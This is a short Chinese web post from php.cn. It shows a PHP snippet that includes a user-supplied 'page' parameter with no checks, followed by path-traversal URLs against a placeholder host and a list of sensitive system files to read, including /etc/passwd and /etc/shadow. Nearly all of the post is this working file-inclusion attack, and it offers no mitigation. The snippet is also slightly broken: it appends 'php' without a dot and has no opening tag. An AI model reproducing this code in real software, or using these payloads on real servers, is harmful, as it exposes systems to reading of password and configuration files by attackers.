php 伪造本地文件包含漏洞的代码

高洛峰
发布: 2023-03-01 12:56:02
原创
1238 人浏览过

代码如下: 
$page=$_GET['page'];
include($page.'php');
?> 

你可以这样使用 
http://www.xxx.com/index.php?page=../etc/passwd 
http://www.xxx.com/index.php?page=../../../etc/passwd 
http://www.xxx.com/index.php?page=..../../etc/passwd 

获取更多数据: 
etc/profile 
etc/services 
/etc/passwd 
/etc/shadow 
/etc/group 
/etc/security/group 
/etc/security/passwd 
/etc/security/user 
/etc/security/environ 
/etc/security/limits 
/usr/lib/security/mkuser.default 

相关标签:
来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板